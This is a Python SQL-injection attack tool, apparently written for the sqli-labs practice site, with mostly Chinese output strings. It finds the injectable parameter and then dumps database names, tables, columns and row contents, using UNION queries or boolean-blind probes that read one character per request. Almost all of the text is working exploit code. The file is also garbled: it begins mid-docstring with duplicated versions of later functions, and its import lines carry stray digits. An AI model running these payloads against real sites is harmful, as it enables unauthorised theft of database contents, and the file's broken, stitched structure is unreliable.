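    each name one character at a time, with ',' appended to every name so its
    end can be detected.  A position whose character is not in the candidate
    set closes the name and moves on (the original indexed past the end of
    the set and raised IndexError).
    Returns the names as a list (trailing '' from the final ',').
    """
    # The reference page does not change; fetch it once instead of per probe.
    reference = HackRequests.http(url + palyload0, headers=headers).text()
    allLen = 0
    for i in range(1, 10000):
        palyload = palyloadType + 'and+((+select+count(column_name)+from+information_schema.columns+where+table_schema={}+and+table_name={}))={}+--+'.format(SchenaName, table_name, i)
        if HackRequests.http(url + palyload, headers=headers).text() == reference:
            allLen = i
            break
    # Candidate characters; the letters of the lab's column names come first.
    charset = 'idemals,rfugntbchjkopqvwxyz_.'
    strName = ''
    title_shown = False
    for i in range(allLen):
        pos = 1
        while True:
            for s in charset:
                palyload = palyloadType + 'and+substr((concat((select+column_name+from+information_schema.columns+where+table_schema={}+and+table_name={}+limit+{},1),\',\')+),{},1)=\'{}\'--+'.format(SchenaName, table_name, i, pos, s)
                if not title_shown:
                    printtitle(palyload)
                    title_shown = True
                time.sleep(0.1)
                if HackRequests.http(url + palyload, headers=headers).text() == reference:
                    strName = strName + s
                    print(s, end='')
                    break
            else:
                # nothing matched at this position: close the name, next column
                strName = strName + ','
                break
            pos = pos + 1
            if s == ',':
                break
    names = strName.split(',')
    print('')
    table = PrettyTable(['column_name'])
    for name in names:
        table.add_row([name])
    print(table)
    return names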
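def GetContext(palyload0, palyloadType, ku, biao, lie):
    """Boolean-blind dump of column `lie` of table `ku.biao`.

    ku / biao / lie are spliced into the SQL unquoted (identifiers).
    Step 1 finds the row count with `count(*) = i` (the original counted the
    hard-coded email_id column, so it only worked on the emails table);
    step 2 reads each row one character at a time, with ',' appended so the
    end of a value is detectable.  A row whose next character is not in the
    candidate set is closed with ',' and skipped instead of indexing past the
    set.  Returns the concatenated string ('value,value,...').
    """
    # The reference page does not change; fetch it once instead of per probe.
    reference = HackRequests.http(url + palyload0, headers=headers).text()
    allLen = 0
    for i in range(1, 10000):
        palyload = palyloadType + 'and+((+select+count(*)+from+' + ku + '.' + biao + '))={}+--+'.format(i)
        if HackRequests.http(url + palyload, headers=headers).text() == reference:
            allLen = i
            break
    print(ku + '数据库{}表{}字段总共有{}行内容'.format(biao, lie, allLen))
    # Candidate characters, lab-data letters first (the original listed the
    # set twice; the second copy only delayed the IndexError).
    charset = 'hakndumb@coi.lvesup+,rfgtbjqwxyz_1234567890'
    strName = ''
    print('{}:'.format(lie))
    title_shown = False
    for row in range(allLen):
        pos = 1
        while True:
            for s in charset:
                palyload = palyloadType + 'and+substr((concat((select+' + lie + '+from+' + ku + '.' + biao + '+limit+{},1),\',\')),{},1)=\'{}\'--+'.format(row, pos, s)
                if not title_shown:
                    printtitle(palyload)
                    title_shown = True
                if HackRequests.http(url + palyload, headers=headers).text() == reference:
                    strName = strName + s
                    print(s, end='')
                    time.sleep(0.3)
                    break
            else:
                # nothing matched at this position: close the value, next row
                strName = strName + ','
                break
            pos = pos + 1
            if s == ',':
                break
    print('')
    table = PrettyTable([lie])
    for value in strName.split(','):
        table.add_row([value])
    print(table)
    return strName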
# Module state filled in by the blind-read helpers:
# length of database() and the name recovered so far.
SchemaLen, SchenaName = 0, ''
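def Get():
    """Driver for the blind (boolean) workflow.

    Detects the injection type with statr(), which sets the module-level
    ``Type``. The extraction steps are kept below as commented example calls;
    nothing beyond the detection runs in this version. Each step takes the
    closer prefix ``palyloadType[Type]`` and the "true" reference page
    ``dic2[Type] + palyload2`` that the oracle compares against.
    """
    global SchenaName, SchemaLen, dic2, url, Type, palyload2
    statr()
    # Closer prefixes for the blind payload builders. Index 5 carries a trailing '+'
    # (space) while the others do not; the builders add their own space before `and`.
    palyloadType = ['?id=1', '?id=1\'', '?id=1\')', '?id=1\'))', '?id=1"', '?id=1")+', '?id=1"))']
    reference = dic2[Type] + palyload2
    # 1. Database name (e.g. security):
    # GetSchemaLen(palyload0=reference, PalyloadType=palyloadType[Type])
    # SchenaName = GetSchenaName(palyload0=reference, palyloadType=palyloadType[Type])
    # 2. Tables. SchenaName must be a SQL expression: database() or a quoted literal
    #    such as "'security'" (an unquoted name from input() would be parsed as an identifier):
    # tablelist = GetTableName(palyload0=reference, palyloadType=palyloadType[Type], SchenaName=SchenaName)
    # 3. Columns (table_name quoted):
    # GetColumns(palyload0=reference, palyloadType=palyloadType[Type], SchenaName='database()', table_name='\'emails\'')
    # 4. Column contents (bare identifiers):
    # name = GetContext(palyload0=reference, palyloadType=palyloadType[Type], ku='security', biao='emails', lie='email_id')
    return palyloadType[Type]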
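if __name__ == '__main__':
    # Run the driver only when executed as a script, not when imported (e.g. by a POST-form
    # variant or a test harness).
    Get()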
from prettytable import PrettyTable2
import HackRequests3
from bs4 import BeautifulSoup4
import re5
import time6
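# 1. Detect whether the target is injectable and which closing sequence it needs.
# Index into the lists below = injection "Type" found by statr():
#   0 numeric, 1 ', 2 '), 3 ')), 4 ", 5 "), 6 "))
Type = 0
# Plain request per closer (closer followed by a `-- ` comment); its page is the baseline.
# Index 2 used to end in `--+1`; the stray 1 sat inside the SQL comment and is dropped.
dic1 = ['?id=1', '?id=1\'+--+', '?id=1\')+--+', '?id=1\'))+--+', '?id=1"+--+', '?id=1")+--+', '?id=1"))+--+']
# Closer prefixes for the boolean probes: dic2 + palyload2 is the "true" page,
# dic3 + palyload3 the "false" page.
dic2 = ['?id=1+', '?id=1\'+', '?id=1\')+', '?id=1\'))+', '?id=1"+', '?id=1")+', '?id=1"))+']
palyload2 = 'and+1+--+'
dic3 = list(dic2)   # identical closers; kept as a separate list for the existing callers
palyload3 = 'and+0+--+'
# url = 'http://192.168.213.130/sqli-labs/Less-{}/'
# url = input('>>输入url')
# NOTE(review): several headers are sent with an empty value; whether HackRequests emits
# them as empty headers is not visible here. Drop them if the target treats e.g. an empty
# Cookie header differently from no header.
headers = {'accept': '', 'accept-encoding': '', 'accept-language': '', 'cache-control': '', 'cookie': '', 'referer': '', 'sec-fetch-dest': '', 'sec-fetch-mode': '', 'sec-fetch-site': '', 'sec-fetch-user': '',
           'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36'}
# Lab target (sqli-labs). Point this only at hosts you are authorised to test.
url = 'http://192.168.213.130/sqli-labs/Less-1/'
# url = input('输入url')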
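def statr():
    """Detect the injection "Type": which closing sequence the back-end query
    needs before an appended ``and ...`` is evaluated.

    For each closer index i the plain page (``dic1[i]``), the ``and 1`` page
    (``dic2[i] + palyload2``) and the ``and 0`` page (``dic3[i] + palyload3``)
    are fetched; the first i whose true page equals the plain page while the
    false page differs is a working boolean oracle. It is stored in the
    module-level ``Type`` and returned.

    Exits (SystemExit) for a POST form, which this driver does not handle, and
    when no closer works: every later payload builder indexes the closer lists
    with ``Type``, so continuing with the default 0 would silently run numeric
    payloads against an untested target. The original printed the "not
    injectable" table and then carried on.
    """
    global Type
    landing = HackRequests.http(url, headers=headers).text()
    # Same form check as before, but case-insensitive so METHOD="POST" is caught too.
    if re.search(r'form.*?method="post"', landing, re.IGNORECASE):
        print('')
        print('Post型请使用其他程序')
        raise SystemExit(1)
    for i, (plain, true_prefix, false_prefix) in enumerate(zip(dic1, dic2, dic3)):
        page_plain = HackRequests.http(url + plain, headers=headers).text()
        page_true = HackRequests.http(url + true_prefix + palyload2, headers=headers).text()
        page_false = HackRequests.http(url + false_prefix + palyload3, headers=headers).text()
        if page_true == page_plain and page_plain != page_false:
            Type = i
            return Type
    print('')
    table = PrettyTable(['url', '是否可注入', '注入paload', '注入类型', '请求方式'])
    table.add_row([url, '否', '-------', '不能使用联合查询', 'Get'])
    print(table)
    raise SystemExit(1)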
#2.测试联合点
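def TestUnion(palyloadType, param, union='', bPrint=True, bPrint2=True):
    """Probe for a UNION-based injection point and, when one exists, read
    ``param`` (an expression such as ``group_concat(table_name)``) through it.

    palyloadType  closer prefix, e.g. ``?id=1'+``
    param         SQL expression placed in the displayed column
    union         optional ``FROM ... WHERE ...`` tail appended after the column list
    bPrint        print the result table
    bPrint2       print the "injectable" summary table (only together with bPrint)

    Returns the extracted values split on ``,`` (the group_concat separator).
    Returns ``[]`` when no displayed column or no marker is found; the original
    returned None in the first case and raised IndexError in the second.
    """
    marker = '236987'
    num_cols = 0
    shown = []
    probe_cols = []
    # 1. Column count: add one probe column per attempt. Each probe is 999<i>236987, so the
    # index of the column the page displays can be read back. `limit 1,1` skips the
    # legitimate first row so that the UNION row is the one shown.
    for i in range(1, 10):
        probe_cols.append('999{}{}'.format(i, marker))
        probe = 'union+select+{}+limit+1,1--+'.format(','.join(probe_cols))
        page = HackRequests.http(url + palyloadType + probe, headers=headers).text()
        shown = re.findall('999(.*?)' + marker, page)
        if shown:
            num_cols = i
            if bPrint and bPrint2:
                print('')
                table = PrettyTable(['url', '是否可注入', '注入paload', '注入类型', '请求方式'])
                # Report the probe that worked rather than the boolean payload.
                table.add_row([url, '是', palyloadType + probe, '联合查询', 'Get'])
                print(table)
            break
    else:
        print('')
        table = PrettyTable(['url', '是否可注入', '注入paload', '注入类型', '请求方式'])
        table.add_row([url, '是', palyloadType + palyload2, '不能使用联合查询', 'Get'])
        print(table)
        print('')
        return []
    try:
        show_col = int(shown[0])
    except ValueError:
        print('无法解析回显列: {}'.format(shown[0]))
        return []
    # 2. Real query: the displayed column carries concat(999,<param>,236987), every other
    # column a literal 1. The displayed column is tested first so that column 1 being the
    # echo column works (the original always emitted '1' for the first column).
    select_cols = []
    for i in range(1, num_cols + 1):
        if i == show_col:
            select_cols.append('concat(999,{},{})'.format(param, marker))
        else:
            select_cols.append('1')
    if union == '':
        payload = 'union+select+{}+limit+1,1--+'.format(','.join(select_cols))
    else:
        payload = 'union+select+{}+{}+limit+1,1+--+'.format(','.join(select_cols), union)
    page = HackRequests.http(url + palyloadType + payload, headers=headers).text()
    found = re.findall('999(.*?)' + marker, page)
    if not found:
        print('未在页面中找到回显数据')
        return []
    values = found[0].split(',')
    # Column header: the inner expression of group_concat(...), else the raw param.
    inner = re.findall(r'group_concat\((.*)\)', param)
    table = PrettyTable([inner[0] if inner else param])
    for value in values:
        table.add_row([value])
    if bPrint:
        print(table)
    return values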
#4.解析页面信息,获取查询结果
def n1():
    """Menu item 1: print the current database name (``database()``) through the UNION channel."""
    global Type
    expr = 'group_concat(database()+)'
    TestUnion(dic2[Type], expr)
def n2():
    """Menu item 2: print the server version (``version()``) through the UNION channel."""
    global Type
    TestUnion(dic2[Type], 'group_concat(version())')
def n3():
    """Menu item 3: list the tables of the current schema from information_schema.tables."""
    global Type
    tail = 'FROM+information_schema.tables+WHERE+table_schema+=database()'
    TestUnion(dic2[Type], 'group_concat(table_name)', tail)
def n4(name='', bPrint=True, bPrint2=True):
    """Menu item 4: list the columns of table ``name`` in the current schema.

    An empty ``name`` is prompted for. ``bPrint``/``bPrint2`` are passed through
    to TestUnion, whose result (the column list) is returned. ``name`` is placed
    inside a SQL string literal as typed; it is operator input for the lab target.
    """
    global Type
    table_name = name
    if table_name == '':
        table_name = input('''
请输入需要查询的表名
''')
    tail = 'FROM+information_schema.columns+WHERE+table_schema+=database()+and+table_name=\'{}\''.format(table_name)
    return TestUnion(dic2[Type], 'group_concat(column_name)', tail, bPrint, bPrint2)
def n5():
    """Menu item 5: dump one column of one table (both prompted for) through the UNION channel."""
    global Type
    table_name = input('''
请输入需要查询的表名
''')
    column = input('''
请输入需要查询的列名
''')
    TestUnion(dic2[Type], 'group_concat({})'.format(column), 'FROM+{}+'.format(table_name))
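def union():
    """Interactive menu for the UNION-based queries (1-6).

    Reads a menu number in a loop. A non-numeric or unknown choice is reported
    and the menu is shown again (the original raised ValueError on non-numeric
    input); entering ``0`` leaves the loop, which the original never did.
    """
    prompt = '''
请输入
1:查询数据库
2:查询数据库版本
3:查询表格
4:查询列名
5:查询内容
6:查询指定表格所有内容
'''
    actions = {1: n1, 2: n2, 3: n3, 4: n4, 5: n5, 6: _dump_table}
    while True:
        raw = input(prompt).strip()
        if raw == '0':
            return
        try:
            num = int(raw)
        except ValueError:
            print('请输入数字')
            continue
        action = actions.get(num)
        if action is None:
            print('无效选项')
            continue
        action()


def _dump_table():
    """Menu item 6: dump every column of one table through the UNION channel."""
    name = input('''
请输入需要查询的表名
''')
    # TestUnion may hand back None/[] when no UNION point exists; iterate nothing then.
    columns = n4(name, False) or []
    from_clause = 'FROM+{}+'.format(name)
    for column in columns:
        TestUnion(dic2[Type], 'group_concat({})'.format(column), from_clause, bPrint2=False)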
#盲注-----------------------------------------------------------------------------------------------
def printtitle(palyload):
    """Print the one-row summary used by the blind-injection helpers:
    target url, injectable = yes, the first payload sent, type, HTTP method."""
    summary = PrettyTable(['url', '是否可注入', '注入paload', '注入类型', '请求方式'])
    summary.add_row([url, '是', palyload, '布尔盲注', 'Get'])
    print('')
    print(summary)
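def GetSchemaLen(palyload0, PalyloadType):
    """Boolean-blind lookup of ``length(database())``.

    palyload0    "true" reference payload (closer + ``and 1``); its page is the oracle baseline
    PalyloadType closer prefix, e.g. ``?id=1'``

    Stores the result in the module-level ``SchemaLen`` (0 when nothing matched)
    and returns it. MySQL schema names are at most 64 characters, so the search
    runs to 64 instead of stopping at 19 as the original did; the pointless
    length-0 probe is skipped.
    """
    global SchenaName, SchemaLen, dic2, url
    baseline = HackRequests.http(url + palyload0, headers=headers).text()
    SchemaLen = 0
    for n in range(1, 65):
        probe = url + PalyloadType + '+and+length(database())+=+{}+--+'.format(n)
        time.sleep(0.3)
        if HackRequests.http(probe, headers=headers).text() == baseline:
            SchemaLen = n
            return SchemaLen
    print('未能确定数据库名长度')
    return SchemaLen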
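def GetSchenaName(palyload0, palyloadType):
    """Boolean-blind extraction of ``database()``, one character per position.

    palyload0    "true" reference payload; its page is the oracle baseline
    palyloadType closer prefix, e.g. ``?id=1'``

    Requires ``SchemaLen`` (see GetSchemaLen). Rebuilds the module-level
    ``SchenaName`` from scratch (the original appended to whatever was there,
    so a second call doubled the name), prints it as a table and returns it.
    A position that matches nothing in ``charset`` is recorded as ``?`` so the
    remaining positions stay aligned. Comparison is case-insensitive under
    MySQL's default collations, so the name comes back lower-case.
    """
    global SchenaName, SchemaLen, dic2, url, Type
    charset = 'etaoinsrhldcumfpgwybvkxjqz0123456789_.@+'   # '+' decodes to a space
    baseline = HackRequests.http(url + palyload0, headers=headers).text()
    SchenaName = ''
    first = True
    for pos in range(1, SchemaLen + 1):
        matched = '?'
        for ch in charset:
            # Leading '+' (space) before `and` so the numeric closer does not yield `1and`.
            payload = palyloadType + '+and+substr(database(),{},1)=\'{}\'--+'.format(pos, ch)
            if first:
                printtitle(payload)
                first = False
            time.sleep(0.3)
            if HackRequests.http(url + payload, headers=headers).text() == baseline:
                matched = ch
                break
        SchenaName += matched
        print(matched, end='')
    print('')
    table = PrettyTable(['数据库:'])
    table.add_row([SchenaName])
    print(table)
    return SchenaName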
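def GetTableName(palyload0, palyloadType, SchenaName='database()'):
    """Boolean-blind extraction of the table names of one schema.

    palyload0    "true" reference payload; its page is the oracle baseline
    palyloadType closer prefix, e.g. ``?id=1'``
    SchenaName   SQL expression for the schema, quotes included when it is a
                 literal: ``database()`` (default) or ``"'security'"``. The
                 original honoured it only in the length query and always read
                 ``database()`` in the name query; both now use it.

    Reads ``group_concat(table_name)`` one character per request and splits on
    ``,``. Prints the names and returns them as a list. A miss is recorded as
    ``?`` so later positions stay aligned (the original stalled on the same
    position for the rest of the run). group_concat is truncated at the server's
    group_concat_max_len (1024 by default), so a schema with very many tables is
    listed incompletely.
    """
    global SchemaLen, dic2, url
    charset = 'etaoinsrhldcumfpgwybvkxjqz0123456789_$,'
    baseline = HackRequests.http(url + palyload0, headers=headers).text()

    def oracle(payload):
        time.sleep(0.3)
        return HackRequests.http(url + payload, headers=headers).text() == baseline

    names_expr = ('(select+group_concat(TABLE_NAME)+FROM+information_schema.TABLES'
                  '+where+table_schema=' + SchenaName + ')')
    # 1. Total length of the comma-joined list. A NULL result (no tables) never matches;
    # the loop then ends without a hit and an empty list is returned.
    # Leading '+' (space) before `and` so the numeric closer does not yield `1and`.
    allLen = 0
    for i in range(1, 10000):
        if oracle(palyloadType + '+and+length(' + names_expr + ')+=+{}+--+'.format(i)):
            allLen = i
            break
    if allLen == 0:
        print('未找到数据表')
        return []
    # 2. One character per position.
    strName = ''
    first = True
    for pos in range(1, allLen + 1):
        matched = '?'
        for ch in charset:
            payload = palyloadType + '+and+substr(' + names_expr + ',{},1)=\'{}\'--+'.format(pos, ch)
            if first:
                printtitle(payload)
                first = False
            if oracle(payload):
                matched = ch
                break
        strName += matched
        print(matched, end='')
    print('')
    tables = strName.split(',')
    table = PrettyTable([SchenaName])
    for name in tables:
        table.add_row([name])
    print(table)
    return tables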
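def GetColumns(palyload0, palyloadType, table_name, SchenaName='database()'):
    """Boolean-blind extraction of the column names of one table.

    palyload0     "true" reference payload (closer + ``and 1``); its page is the oracle baseline
    palyloadType  closer prefix, e.g. ``?id=1'``
    table_name    SQL expression for the table, quotes included, e.g. ``"'emails'"``
    SchenaName    SQL expression for the schema: ``database()`` or ``"'security'"``

    Each name is read one character per request from
    ``concat((select column_name ... limit <row>,1), ',')``; the appended ``,``
    marks the end of the name. Prints the names as a table and returns them as
    a list (the original only printed). A character outside ``charset`` is
    reported as ``?`` instead of raising IndexError as the original did when its
    candidate string ran out, and a name is abandoned after 64 characters, the
    MySQL identifier limit. Comparison is case-insensitive under MySQL's default
    collations, so names come back lower-case.
    """
    global SchemaLen, dic2, url
    charset = 'etaoinsrhldcumfpgwybvkxjqz0123456789_$'
    terminator = ','
    max_name_len = 64
    baseline = HackRequests.http(url + palyload0, headers=headers).text()

    def oracle(payload):
        time.sleep(0.1)
        return HackRequests.http(url + payload, headers=headers).text() == baseline

    # Leading '+' (space) before `and` so the numeric closer does not yield `1and`.
    count_tpl = (palyloadType + '+and+((+select+count(column_name)+from+information_schema.columns'
                 '+where+table_schema={}+and+table_name={}))={}+--+')
    char_tpl = (palyloadType + '+and+substr((concat((select+column_name+from+information_schema.columns'
                '+where+table_schema={}+and+table_name={}+limit+{},1),\',\')+),{},1)=\'{}\'--+')
    # 1. Number of columns. Start at 0 so an unknown table is reported instead of probed 10000 times.
    allLen = -1
    for i in range(0, 10000):
        if oracle(count_tpl.format(SchenaName, table_name, i)):
            allLen = i
            break
    if allLen <= 0:
        print('未找到字段,表 {} 可能不存在'.format(table_name))
        return []
    # 2. Names, one character per request.
    names = []
    first = True
    for row in range(allLen):
        name = ''
        for pos in range(1, max_name_len + 2):   # one extra position for the terminator
            matched = None
            for ch in charset + terminator:
                payload = char_tpl.format(SchenaName, table_name, row, pos, ch)
                if first:
                    printtitle(payload)
                    first = False
                if oracle(payload):
                    matched = ch
                    break
            if matched == terminator:
                break
            if matched is None:
                matched = '?'   # not in charset; keep the position alignment
            name += matched
            print(matched, end='')
        print(terminator, end='')
        names.append(name)
    print('')
    table = PrettyTable(['column_name'])
    for name in names:
        table.add_row([name])
    print(table)
    return names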
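def GetContext(palyload0, palyloadType, ku, biao, lie, max_len=256):
    """Boolean-blind extraction of every value of one column.

    palyload0     "true" reference payload (closer + ``and 1``); its page is the oracle baseline
    palyloadType  closer prefix, e.g. ``?id=1'``
    ku, biao, lie bare identifiers (no quotes) for database, table and column,
                  e.g. ``security``, ``emails``, ``email_id``
    max_len       give up on a value after this many characters (new, optional)

    Prints the values as a table and returns them as one comma-joined string
    with a trailing ``,`` (``'a,b,'``), which is what the original returned.

    Each value is read one character per request: the oracle compares the page
    for ``substr(concat(<value>, ','), pos, 1) = '<c>'`` with the baseline page,
    and the appended ``,`` marks the end of the value. Limitations: a value that
    itself contains ``,`` is cut there; characters outside ``charset`` are
    reported as ``?``; comparison is case-insensitive under MySQL's default
    collations, so letters come back lower-case (confirm on the target).

    Fixes relative to the original: the row count used a hard-coded
    ``count(email_id)`` (so it only worked for the emails table), an exhausted
    candidate string raised IndexError, and a NULL value looped forever.
    """
    global SchenaName, SchemaLen, dic2, url
    # '+' decodes to a space. Quotes, '&', '#' and '%' cannot be sent raw and are not probed.
    charset = 'etaoinsrhldcumfpgwybvkxjqz0123456789@._-+'
    terminator = ','
    baseline = HackRequests.http(url + palyload0, headers=headers).text()

    def oracle(payload):
        # One request per probe, paced like the original.
        time.sleep(0.3)
        return HackRequests.http(url + payload, headers=headers).text() == baseline

    table_ref = '{}.{}'.format(ku, biao)
    # 1. Row count. count(*) agrees with the `limit <row>,1` offsets even when the column
    # holds NULLs. Starting at 0 stops immediately for an empty table. The leading '+'
    # (space) before `and` keeps the numeric closer from producing `1and`.
    allLen = 0
    for i in range(0, 10000):
        if oracle(palyloadType + '+and+((+select+count(*)+from+' + table_ref + '))={}+--+'.format(i)):
            allLen = i
            break
    print(ku + '数据库{}表{}字段总共有{}行内容'.format(biao, lie, allLen))
    print('{}:'.format(lie))
    # 2. Values, one row at a time.
    row_expr = '(select+' + lie + '+from+' + table_ref + '+limit+{},1)'
    values = []
    first = True
    for row in range(allLen):
        this_row = row_expr.format(row)
        # A NULL never matches any character; detect it with one request instead of max_len probes.
        if oracle(palyloadType + '+and+(' + this_row + '+is+null)+--+'):
            values.append('NULL')
            print('NULL' + terminator, end='')
            continue
        value = ''
        for pos in range(1, max_len + 2):   # one extra position for the terminator
            matched = None
            for ch in charset + terminator:
                payload = palyloadType + '+and+substr((concat(' + this_row + ',\',\')),{},1)=\'{}\'--+'.format(pos, ch)
                if first:
                    printtitle(payload)
                    first = False
                if oracle(payload):
                    matched = ch
                    break
            if matched == terminator:
                break
            if matched is None:
                matched = '?'   # not in charset; keep the position alignment
            value += matched
            print(matched, end='')
        print(terminator, end='')
        values.append(value)
    print('')
    table = PrettyTable([lie])
    for value in values:
        table.add_row([value])
    print(table)
    return ''.join(value + terminator for value in values)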
# Shared blind-injection state: length and value of database(), filled in by
# GetSchemaLen() and GetSchenaName().
SchemaLen, SchenaName = 0, ''
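def Get():
    """Driver for the blind (boolean) workflow.

    Detects the injection type with statr(), which sets the module-level
    ``Type``. The extraction steps are kept below as commented example calls;
    nothing beyond the detection runs in this version. Each step takes the
    closer prefix ``palyloadType[Type]`` and the "true" reference page
    ``dic2[Type] + palyload2`` that the oracle compares against.
    """
    global SchenaName, SchemaLen, dic2, url, Type, palyload2
    statr()
    # Closer prefixes for the blind payload builders. Index 5 carries a trailing '+'
    # (space) while the others do not; the builders add their own space before `and`.
    palyloadType = ['?id=1', '?id=1\'', '?id=1\')', '?id=1\'))', '?id=1"', '?id=1")+', '?id=1"))']
    reference = dic2[Type] + palyload2
    # 1. Database name (e.g. security):
    # GetSchemaLen(palyload0=reference, PalyloadType=palyloadType[Type])
    # SchenaName = GetSchenaName(palyload0=reference, palyloadType=palyloadType[Type])
    # 2. Tables. SchenaName must be a SQL expression: database() or a quoted literal
    #    such as "'security'" (an unquoted name from input() would be parsed as an identifier):
    # tablelist = GetTableName(palyload0=reference, palyloadType=palyloadType[Type], SchenaName=SchenaName)
    # 3. Columns (table_name quoted):
    # GetColumns(palyload0=reference, palyloadType=palyloadType[Type], SchenaName='database()', table_name='\'emails\'')
    # 4. Column contents (bare identifiers):
    # name = GetContext(palyload0=reference, palyloadType=palyloadType[Type], ku='security', biao='emails', lie='email_id')
    return palyloadType[Type]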
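if __name__ == '__main__':
    # Run the driver only when executed as a script, not when imported (e.g. by a POST-form
    # variant or a test harness).
    Get()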
